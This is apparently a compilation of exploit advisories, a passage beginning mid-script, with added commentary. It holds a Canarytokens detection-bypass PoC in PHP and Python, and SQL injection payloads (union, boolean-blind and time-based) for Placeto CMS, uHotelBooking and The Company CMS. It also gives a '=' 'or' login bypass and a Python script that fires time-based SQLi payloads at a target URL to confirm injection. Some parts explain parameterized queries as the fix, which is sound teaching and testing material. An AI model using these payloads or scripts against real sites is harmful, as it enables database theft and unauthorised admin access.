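    print("NetShareWatcher:", netsharewatcher_layout())
    print("DVD X Player:   ", dvdx_layout())
```

The DVD X Player result reports byte 0x1a inside the handler address, which is exactly the restricted-char trade-off the exploit comment describes; the same check on a new target tells you immediately whether a chosen pop/pop/ret address survives the filter before you spend time debugging a crash that never reaches the handler.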
            
# Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
# Date: 20.03.2019
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale 
# Vendor Homepage: https://thinkst.com/
# Version: up to 2019-03-01
# Software Link: https://github.com/thinkst/canarytokens
# Google Dork: N/A 
# CVE: CVE-2019-9768
#==================================================================================================================================================================================
# PoC:
#
# Requires unzip:
#
# sudo apt-get install unzip
#
# Usage: php canary_check.php <name>   (inspects <name>.docx in the current directory)
#

<?php

$name = $argv[1];
$docx = $name . '.docx';

// Extract only the metadata part the check relies on; quote the argument so a crafted
// file name cannot inject shell commands.
system('unzip -o -q ' . escapeshellarg($docx) . ' docProps/core.xml');

$strFile = file_get_contents("docProps/core.xml");

// Canarytokens documents carry fixed metadata (the 'AAAAAAAAAAAAAAAA' filler and the
// 2015-07-21 timestamp) and are small. Compare with !== : strpos() returns 0, which == false,
// when the needle sits at offset 0.
if (strpos($strFile, 'AAAAAAAAAAAAAAAA') !== false && strpos($strFile, '2015-07-21') !== false && filesize($docx) < 170000)
{
     echo "This file probably contains a CanaryToken! Open it with LibreOffice/Microsoft Word Protected View to bypass detection\n";
}
else
{
     echo "Should be safe to open normally\n";
}
?>
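The PHP PoC shells out to unzip and leaves extracted files behind. The Python version below is an added example, not the PoC authors' code, that applies the same three-part heuristic (both marker strings in docProps/core.xml, package under 170000 bytes) to the .docx package in memory, and builds a minimal constructed package so the check can be exercised offline. The marker strings and size limit come from the PoC; the sample core.xml contents are made up for the test and are not real Canarytokens output.

```python
import io
import zipfile

# Heuristic from the PHP PoC: both markers present in docProps/core.xml and a small package.
MARKERS = ("AAAAAAAAAAAAAAAA", "2015-07-21")
MAX_SIZE = 170000


def looks_like_canary_docx(data):
    """Inspect a .docx (a zip package) entirely in memory: no shell, no extracted files."""
    if len(data) >= MAX_SIZE:
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            core = zf.read("docProps/core.xml").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError):
        # Not a zip, or no core.xml part: nothing for the heuristic to match on.
        return False
    return all(marker in core for marker in MARKERS)


def build_docx(core_xml):
    """Constructed minimal package for testing; real documents carry many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core_xml)
        zf.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


# Constructed core.xml samples (not real Canarytokens output).
CANARY_CORE = (
    "<cp:coreProperties><dc:creator>AAAAAAAAAAAAAAAA</dc:creator>"
    "<dcterms:created>2015-07-21T00:00:00Z</dcterms:created></cp:coreProperties>"
)
NORMAL_CORE = (
    "<cp:coreProperties><dc:creator>jdoe</dc:creator>"
    "<dcterms:created>2019-03-20T10:00:00Z</dcterms:created></cp:coreProperties>"
)


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print("probably a CanaryToken" if looks_like_canary_docx(fh.read()) else "no marker found")
```

The check is deliberately the same weak fingerprint the PoC relies on; its value for a defender is the inverse of the attacker's, which is that any token generator emitting constant metadata is trivially fingerprintable, and randomising those fields is the fix.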
            
Placeto CMS Alpha v4 - 'page' SQL Injection

# Title: Placeto CMS
# Date: 21.03.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://sourceforge.net/projects/placeto/
# Software Link: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
# Version: Alpha rv.4
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
A lightweight, easy to use PHP content management system (CMS). Written to
be fast and to use as little memory as possible. Placeto CMS offers browser
and server caching, provides gzip compression and to cut down on bandwidth
and CPU time.

# Vulnerabilities:
# After logging in as an authorized user, an attacker can read all database
contents through the 'page' parameter.


# POC - SQLi :

# Parameter: page (GET)
# Request URL: http://localhost/placeto/admin/edit.php?page=key

#    Type : boolean-based blind
page=JyI" AND 1647=1647 AND "svwN"="svwN

#    Type : time-based blind
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY

#    Type : union query
page=-8388" UNION ALL SELECT NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CbSf
            
# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://localhost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
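The Netartmedia loginaction.php PoCs above (PHP Mall, Jobs Portal, PHP Business Directory, Deals Portal) and the uHotelBooking one all use the same MySQL time-based payload, 0'XOR(if(now()=sysdate(),sleep(n),0))XOR'Z: the XOR clauses close and reopen the string literal, and now()=sysdate() is always true inside one statement, so sleep(n) runs. Note that the sleep(0) form in the loginaction.php PoCs produces no delay by itself; confirming the injection means comparing a nonzero sleep against that baseline. The script below is an added example, not the advisory author's, that does exactly that with a pluggable measurement callable so the decision logic can be tested without a live target. The target URL and the Password/lang/mod fields are assumptions copied from the PoC request bodies.

```python
import time
import urllib.parse
import urllib.request

# Payload shape from the Netartmedia PoCs; n=0 is the no-delay baseline.
SLEEP_PAYLOAD = "0'XOR(if(now()=sysdate(),sleep({n}),0))XOR'Z"


def http_measure(url, field="Email", extra_fields=None, timeout=60):
    """Return a callable that POSTs one payload in `field` and reports the elapsed seconds.

    The default extra fields mirror the loginaction.php PoC bodies above (assumed, not verified).
    """
    extra = dict(extra_fields or {"Password": "g00dPa$$w0rD", "lang": "en", "mod": "login"})

    def measure(payload):
        fields = dict(extra)
        fields[field] = payload
        body = urllib.parse.urlencode(fields).encode()
        req = urllib.request.Request(url, data=body, method="POST")
        start = time.perf_counter()
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
        return time.perf_counter() - start

    return measure


def confirm_time_based(measure, delay=5, trials=2, tolerance=0.8):
    """True when every sleep(delay) request takes at least tolerance*delay longer than sleep(0).

    Measuring the sleep(0) baseline first rules out an endpoint that is merely slow, and
    repeating the delayed request keeps a single jittery response from producing a false positive.
    """
    baseline = max(measure(SLEEP_PAYLOAD.format(n=0)) for _ in range(trials))
    for _ in range(trials):
        elapsed = measure(SLEEP_PAYLOAD.format(n=delay))
        if elapsed - baseline < delay * tolerance:
            return False
    return True


if __name__ == "__main__":
    import sys
    # e.g. python3 timeblind.py http://localhost/[PATH]/loginaction.php
    target = sys.argv[1]
    verdict = confirm_time_based(http_measure(target))
    print("time-based SQLi confirmed" if verdict else "not confirmed")
```

For the uHotelBooking GET case, pass a measure callable that builds the query string instead; the decision logic in confirm_time_based is unchanged.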
            
# Exploit Title: The Company Business Website CMS - 'user_name' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/production/login.php
Vulnerable Parameter: user_name (POST)
Payload: user_name=VNfn' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL-- WMfV&user_password=&loggin=Psop


# Exploit Title: The Company Business Website CMS - Authentication Bypass
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/admin/production/login.php
Username: '=' 'or'
Password: '=' 'or'
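The boolean-based payloads on this page (Vlog System's -1' OR 3*2*1=6 AND 000371=000371 -- , Placeto's AND 1647=1647) and the Company CMS login bypass all work for one reason: the handler concatenates the parameter into the SQL string, so the input closes the literal and appends its own condition. The sqlite3 script below is an added example, not code from any of the advisories, that puts the vulnerable lookup beside its parameterized form and runs the Vlog System payload and its false twin through both, which is the true/false differential a boolean-blind oracle is built on. The table and rows are constructed for the demonstration. The '=' 'or' bypass is deliberately not reproduced here: it relies on MySQL's loose comparison, where (user_name='')='' evaluates 0='' as true, and SQLite's strict typing does not behave the same way.

```python
import sqlite3

# Constructed sample data, not from the page.
ROWS = [(1, "alice@example.com", "secret-1"), (2, "bob@example.com", "secret-2")]

# Vlog System payload from the advisory above (URL-decoded), and a false twin for the oracle.
TRUE_PAYLOAD = "-1' OR 3*2*1=6 AND 000371=000371 -- "
FALSE_PAYLOAD = "-1' OR 3*2*1=7 AND 000371=000371 -- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, email):
    """What the forgotten_password/login handlers do: the parameter is pasted into the SQL text."""
    sql = "SELECT id, email FROM users WHERE email = '%s'" % email
    return conn.execute(sql).fetchall()


def safe_lookup(conn, email):
    """Same query with a bound parameter: the input is only ever compared as a string value."""
    return conn.execute("SELECT id, email FROM users WHERE email = ?", (email,)).fetchall()


def oracle(conn, payload):
    """Boolean-blind oracle: did the injected condition make the query return any rows?"""
    return len(vulnerable_lookup(conn, payload)) > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true condition :", vulnerable_lookup(db, TRUE_PAYLOAD))
    print("vulnerable, false condition:", vulnerable_lookup(db, FALSE_PAYLOAD))
    print("parameterized, same input  :", safe_lookup(db, TRUE_PAYLOAD))
```

With the vulnerable lookup, the true payload returns every row and the false one returns none, which is all a blind attacker needs to extract data one condition at a time; the parameterized lookup returns nothing for either, because the whole payload is just an e-mail address that does not exist.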